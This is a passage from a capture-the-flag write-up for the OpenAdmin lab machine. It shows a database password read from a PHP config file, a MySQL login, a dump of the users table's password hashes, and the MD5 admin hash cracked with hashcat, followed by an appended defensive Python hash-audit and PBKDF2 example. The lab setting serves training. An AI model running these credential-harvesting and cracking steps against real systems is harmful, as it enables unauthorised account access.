DB


I found that port 3306 on the loopback is up and listening.

www-data@openadmin:/opt/ona/www/local/config$ cat database_settings.inc.php
cat database_settings.inc.php
<?php
 
$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);
 
?>

I found the config file for the local DB: /opt/ona/www/local/config/database_settings.inc.php. In it I can see the DB credential: ona_sys:n1nj4W4rri0R!

mysql


www-data@openadmin:/opt/ona/www/local/config$ mysql -uona_sys -p
Enter password: n1nj4W4rri0R!
 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 90
Server version: 5.7.28-0ubuntu0.18.04.4 (Ubuntu)
 
Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| ona_default        |
+--------------------+
2 rows in set (0.02 sec)
 
mysql> use ona_default;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> show tables;
+------------------------+
| Tables_in_ona_default  |
+------------------------+
|         [...]          |
| ona_logs               |
| permissions            |
| sessions               |
| subnet_types           |
| subnets                |
| sys_config             |
| users                  |
+------------------------+
40 rows in set (0.00 sec)
 
mysql> select id,username,password from users;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | guest    | 098f6bcd4621d373cade4e832627b4f6 |
|  2 | admin    | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

Logging in to the MySQL server with the credential found above, I was able to find credential hashes for 2 users: admin and guest.

I am interested in the admin user.

Hashcat


┌──(kali㉿kali)-[~/archive/htb/labs/openadmin]
└─$ hashcat -a 0 -m 0 admin.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
OpenCL API (OpenCL 3.0 PoCL 3.0+debian  Linux, None+Asserts, RELOC, LLVM 13.0.1, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* device #1: pthread-11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz, 1438/2941 MB (512 MB allocatable), 4MCU
 
minimum password length supported by kernel: 0
maximum password length supported by kernel: 256
 
hashes: 1 digests; 1 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
 
optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Hash
* Single-Salt
* Raw-Hash
 
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
 
watchdog: Temperature abort trigger set to 90c
 
host memory required for this attack: 0 MB
 
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
 
21232f297a57a5a743894a0e4a801fc3:admin

session..........: hashcat
status...........: Cracked
hash.mode........: 0 (MD5)
hash.target......: 21232f297a57a5a743894a0e4a801fc3
time.started.....: Tue Oct 11 17:21:15 2022 (0 secs)
time.estimated...: Tue Oct 11 17:21:15 2022 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........:   311.3 kH/s (0.07ms) @ Accel:256 Loops:1 Thr:1 Vec:8
recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
progress.........: 20480/14344385 (0.14%)
rejected.........: 0/20480 (0.00%)
restore.point....: 19456/14344385 (0.14%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: leonardo1 -> michelle4
hardware.mon.#1..: Util: 27%
 
started: Tue Oct 11 17:21:15 2022
stopped: Tue Oct 11 17:21:17 2022

Hashcat cracked the password hash for the admin user: admin. This doesn't provide anything valuable as it is a web credential.
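As an added example (not code from this write-up or from OpenNetAdmin), here is how a defender would audit the users table rows shown above and what hardened storage looks like in place of the unsalted MD5 that let hashcat recover the admin password in seconds. The two sample rows are copied from the query output; the default-password list, the `audit_user_hashes`/`hash_password`/`verify_password` names and the `salt$iterations$digest` storage format are my own assumptions.

```python
import hashlib
import hmac
import os
import re

# Constructed sample: the two rows returned by
# "select id,username,password from users;" on the box above.
USERS_ROWS = [
    (1, "guest", "098f6bcd4621d373cade4e832627b4f6"),
    (2, "admin", "21232f297a57a5a743894a0e4a801fc3"),
]

# Hypothetical list of vendor-default passwords an auditor checks for
# (assumption; the page only shows that "admin" is in use).
DEFAULT_GUESSES = ["admin", "password"]

# A bare 32-hex-digit value with no salt or scheme prefix is the fingerprint
# of unsalted MD5 storage: identical passwords give identical hashes and a
# wordlist attack like the hashcat run above is essentially free.
UNSALTED_MD5 = re.compile(r"^[0-9a-f]{32}$")


def audit_user_hashes(rows, guesses=DEFAULT_GUESSES):
    """Flag rows stored as unsalted MD5 and report whether the digest equals
    the MD5 of a known default password (i.e. the default was never changed)."""
    findings = []
    for _id, username, stored in rows:
        if not UNSALTED_MD5.match(stored):
            continue  # some other scheme; out of scope for this check
        matched = next(
            (g for g in guesses if hashlib.md5(g.encode()).hexdigest() == stored),
            None,
        )
        findings.append({"username": username, "scheme": "unsalted-md5",
                         "default_password": matched})
    return findings


# Hardened storage: PBKDF2-HMAC-SHA256, per-user random 16-byte salt, high
# iteration count, stored as "salt_hex$iterations$digest_hex" (our own format).
PBKDF2_ITERATIONS = 600_000


def hash_password(password, salt=None, iterations=PBKDF2_ITERATIONS):
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{salt.hex()}${iterations}${digest.hex()}"


def verify_password(password, stored):
    salt_hex, iterations, digest_hex = stored.split("$")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # Constant-time comparison so verification timing leaks nothing.
    return hmac.compare_digest(candidate.hex(), digest_hex)
```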